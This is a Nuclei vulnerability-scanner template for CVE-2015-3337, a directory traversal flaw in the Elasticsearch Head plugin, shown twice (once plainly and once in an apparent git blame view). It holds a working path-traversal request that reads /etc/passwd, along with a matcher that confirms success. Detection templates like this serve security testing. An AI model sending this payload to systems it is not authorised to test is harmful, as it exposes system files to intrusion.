nuclei-templates/cves/2015/CVE-2015-3337.yaml

id: CVE-2015-3337

info:
 name: Elasticsearch Head plugin LFI
 author: pdteam
 severity: high
 description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
 reference: https://www.exploit-db.com/exploits/37054/
 tags: cve,cve2015,elastic,lfi

requests:
 - method: GET
   path:
    - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"

   matchers-condition: and
   matchers:
    - type: regex
      regex:
       - "root:[x*]:0:0"
      part: body

    - type: status
      status:
       - 200
Added CVE-2015-3337 2021-03-24 20:51:43 +00:00			`id: CVE-2015-3337`

			`info:`
			`name: Elasticsearch Head plugin LFI`
			`author: pdteam`
			`severity: high`
			`description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.`
Description and references 2021-04-22 09:04:36 +00:00			`reference: https://www.exploit-db.com/exploits/37054/`
Added CVE-2015-3337 2021-03-24 20:51:43 +00:00			`tags: cve,cve2015,elastic,lfi`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0"`
			`part: body`

			`- type: status`
			`status:`
			`- 200`